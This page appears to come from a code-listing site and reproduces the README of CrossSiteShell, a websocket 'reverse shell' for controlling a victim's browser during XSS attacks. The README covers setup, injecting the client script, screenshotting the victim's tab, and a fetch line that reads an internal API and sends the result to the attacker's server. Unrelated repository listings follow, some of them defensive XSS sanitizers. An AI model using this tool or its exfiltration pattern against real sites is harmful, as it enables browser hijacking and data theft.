A websocket-based reverse shell for XSS attacks.

Rafael

Last update: Oct 7, 2022

Related tags

WebSocket crosssiteshell

Overview

CrossSiteShell

A javascript/nodejs "reverse shell" that makes it easier to interact with the victim's browser during XSS attacks.

Usage

Run the following commands to start up the server:

npm install
node server.js

Then import the script located at http(s)://yourserver/client.js in any webpage.

Asynchronous data exfiltration

By default, the commands are executed through the eval function which is not asynchronous. To overcome this, I created a callback function (window.oobsend(string)) that sends data to the server asynchronously. Here's an example of how to use it to communicate with an internal API:

fetch('https://internalservice/api').then(x => x.text().then(oobsend))

Taking screenshots

By using the .ss command in the console, CrossSiteShell will attempt to take a screenshot of the victims tab. This is achieved by importing another library (html2canvas) that converts the HTML/CSS into a canvas and saves it's content as an image. The image should be saved to your disk after it gets received.

HTTPS

HTTPS is not supported by default. I'd recommend using a reverse proxy such as nginx to redirect traffic to the script.

A tiny Nuxt.js module for WebSocket interactions

@deepsource/nuxt-websocket A tiny Nuxt.js module for WebSocket interactions. This module is only compatible with Nuxt v2 at the moment. Setup Add @dee

Dec 6, 2022

Um bot feito utilizando a API baileys em WebSocket para o Whatsapp Multi-Devices.

Informação 📀 O BaileysBot foi feito utilzando a API Baileys Caso encontre algum BUG, faça um Novo Issue! Requisitos 📝 NodeJS Git Instalação 💾 Para

Dec 3, 2022

This Repository implements an Authenticated Websocket Server built in Node Js along ws library.

websockets-authentication-server This Repository implements an Authenticated Websocket Server built in Node Js along ws library. Features Authenticate

May 5, 2023

A Promise-based API for WebSockets

websocket-as-promised A WebSocket client library with Promise-based API for browser and Node.js. Example import WebSocketAsPromised from 'websocket-as

Dec 18, 2022

Next-JS interface for 🤖 Open-AI based 🕷 spider-man conversation simulator ⚡️

This is a Next.js project bootstrapped with create-next-app. Getting Started First, run the development server: npm run dev # or yarn dev Open http://

Dec 12, 2022

WebRTC based peer to peer video calling and messaging web app build with MERN stack.

talkhouse WebRTC based peer to peer video calling and messaging web app build with MERN stack. Demo Libraries used React for frontend Socket.io as sig

Nov 26, 2022

shell script replacement; write shell scripts in js instead of bash, then run them with a single static binary

yavascript YavaScript is a bash-like script runner which is distributed as a single statically-linked binary. Scripts are written in JavaScript. There

Dec 29, 2022

it is websocket-store for using easily websocket

Socket-Store It is Websocket Store How to use 1. Install # npm npm install socket-store # yarn yarn add socket-store 2. Create MessageHandler and

Sep 13, 2022

Grupprojekt för kurserna 'Javascript med Ramverk' och 'Agil Utveckling'

JavaScript-med-Ramverk-Laboration-3 Grupprojektet för kurserna Javascript med Ramverk och Agil Utveckling. Utvecklingsguide För information om hur utv

May 18, 2022

Scans your computer for node modules that are potentially vulnerable to supply chain attacks

Scans your computer for node modules that are potentially vulnerable to supply chain attacks. You still need to review the code of modules that are not vulnerable, but this helps.

Apr 11, 2022

A lightweight extension to automatically detect and provide verbose warnings for embedded iframe elements in order to protect against Browser-In-The-Browser (BITB) attacks.

Enhanced iFrame Protection - Browser Extension Enhanced iFrame Protection (EIP) is a lightweight extension to automatically detect and provide verbose

Dec 24, 2022

Hemsida för personer i Sverige som kan och vill erbjuda boende till människor på flykt

Getting Started with Create React App This project was bootstrapped with Create React App. Available Scripts In the project directory, you can run: np

May 3, 2022

Kurs-repo för kursen Webbserver och Databaser

Webbserver och databaser This repository is meant for CME students to access exercises and codealongs that happen throughout the course. I hope you wi

Jan 3, 2023

Fullstack Turborepo starter. Typescript, Nestjs, Nextjs, Tailwind, Prisma, Github Actions, Docker, And Reverse proxy configured

Turborepo (NestJS + Prisma + NextJS + Tailwind + Typescript + Jest) Starter This is fullstack turborepo starter. It comes with the following features.

Jan 9, 2023

Use Cloudflare Pages Functions as a reverse proxy with custom domain support.

cf-page-func-proxy Use Cloudflare Pages Functions as a reverse proxy with custom domain support. Getting Start 1.下载或是Fork本仓库 2.修改_worker.js中的url.hostn

Dec 23, 2022

Zemi is data-driven and reverse-routing library for Express. It provides out-of-the-box OpenAPI support, allowing you to specify and autogenerate an OpenAPI spec.

zemi zemi is a data-driven routing library for Express, built with Typescript. Features: optional, out-of-the-box support for OpenAPI reverse-routing

Jul 23, 2022

DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:

DOMPurify DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It's also very simple to use and get started with

Jan 7, 2023

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist. xss is a module used to filter input from users to prevent XSS

Jan 2, 2023

Secure XSS Filters.

Secure XSS Filters Just sufficient output filtering to prevent XSS! Goals More Secure. Context-dependent output filters that are developer-friendly. I